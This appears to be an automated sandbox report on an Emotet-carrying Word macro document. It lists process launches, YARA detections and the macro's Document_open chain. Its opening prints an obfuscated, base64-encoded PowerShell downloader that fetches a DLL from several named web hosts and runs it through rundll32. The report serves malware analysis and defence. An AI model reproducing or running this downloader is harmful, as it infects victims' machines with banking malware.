wBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA=
Imagebase:	0x13f900000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2512 Parent PID: 2308

General

Start time:	11:20:40
Start date:	25/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
Imagebase:	0xffad0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2360 Parent PID: 2512

General

Start time:	11:20:40
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2097454036.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2097343885.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2708 Parent PID: 2360

General

Start time:	11:20:45
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108873547.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108849548.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2110270893.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2844 Parent PID: 2708

General

Start time:	11:20:50
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2118727946.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2121402086.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2804 Parent PID: 2844

General

Start time:	11:20:55
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2129792071.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2129775635.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2130727723.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2936 Parent PID: 2804

General

Start time:	11:21:00
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2144677498.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2145636371.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2144648920.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 912 Parent PID: 2936

General

Start time:	11:21:05
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2154976635.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2152593179.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2152580168.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2312 Parent PID: 912

General

Start time:	11:21:11
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2163054350.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2163067625.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2163840941.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2848 Parent PID: 2312

General

Start time:	11:21:16
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2178762795.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2173536916.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3032 Parent PID: 2848

General

Start time:	11:21:21
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2188065984.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2186005336.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 620 Parent PID: 3032

General

Start time:	11:21:26
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2198917557.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2195824360.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2368 Parent PID: 620

General

Start time:	11:21:31
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2205471749.0000000000260000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2206163057.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 948 Parent PID: 2368

General

Start time:	11:21:36
Start date:	25/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1
Imagebase:	0xde0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336521474.0000000000720000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2338110050.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336299339.0000000000100000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Nre_13r__v1meabhr2

Declaration

Line	Content
1	Attribute VB_Name = "Nre_13r__v1meabhr2"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 89, Strings: 0, Number of lines: 3, Relevance: 135.003

APIs	Meta Information
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: QjrbGoAT
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: ArvQXC
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Jy5bao1vbuy3ey
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Content
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: C8lfxjyro41
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: GTerTpDH
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: pcKfwB
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: iNtVAIDc
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: CNURGFVBp
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: bHcuF
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: FzldATHyG
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: SJlnAGABP
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: OdqhFz
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Mid
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Name
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Application
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: VTAHFoBxb
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: hpETwA
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: SDQTYAih
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: jhPGFGFEE
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: afoME
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: fDCQH
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: CreateObject
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: izsoCGvJ
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: KLDUkJGJS
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Mid
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Len
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: SDiGFGB
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: OeKxDTJnB
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Create
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: O4diqcx_e7ge
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Soumelol3sb_6v
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: WFlaEdEJF
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Paragraphs
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: Range
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: UBound
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: fAEnDfCC
Part of subcall function Ljahi4yh66g9t6oax@Uved9u320lyen: MidB$

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Ljahi4yh66g9t6oax	executed
11	End Sub

Module: Twwejh034u32ebq

Declaration

Line	Content
1	Attribute VB_Name = "Twwejh034u32ebq"

Module: Uved9u320lyen

Declaration

Line	Content
1	Attribute VB_Name = "Uved9u320lyen"

Executed Functions

Function Ljahi4yh66g9t6oax, APIs: 145, Strings: 71, Number of lines: 234, Relevance: 388.734

APIs	Meta Information
QjrbGoAT
Paragraphs
Range
Range
UBound
ArvQXC
MidB$
Jy5bao1vbuy3ey
Content
C8lfxjyro41
GTerTpDH
Paragraphs
Range
Range
UBound
pcKfwB
MidB$
iNtVAIDc
Paragraphs
Range
Range
UBound
CNURGFVBp
MidB$
bHcuF
Paragraphs
Range
Range
UBound
FzldATHyG
MidB$
SJlnAGABP
Paragraphs
Range
Range
UBound
OdqhFz
MidB$
Mid
Name
Application
VTAHFoBxb
Paragraphs
Range
Range
UBound
hpETwA
MidB$
SDQTYAih
Paragraphs
Range
Range
UBound
jhPGFGFEE
MidB$
Part of subcall function Kfgztxaw46z@Uved9u320lyen: TORFFDHP
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: iScJlw
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
Part of subcall function Kfgztxaw46z@Uved9u320lyen: bIhNCID
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: CWWHXGG
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
Part of subcall function Kfgztxaw46z@Uved9u320lyen: nyozdGEMG
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: zMbQG
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
Part of subcall function Kfgztxaw46z@Uved9u320lyen: RgCBRi
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: hBXXCY
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
afoME
Paragraphs
Range
Range
UBound
fDCQH
MidB$
CreateObject	CreateObject("winmgmts:win32_process")
izsoCGvJ
Paragraphs
Range
Range
UBound
KLDUkJGJS
MidB$
Mid
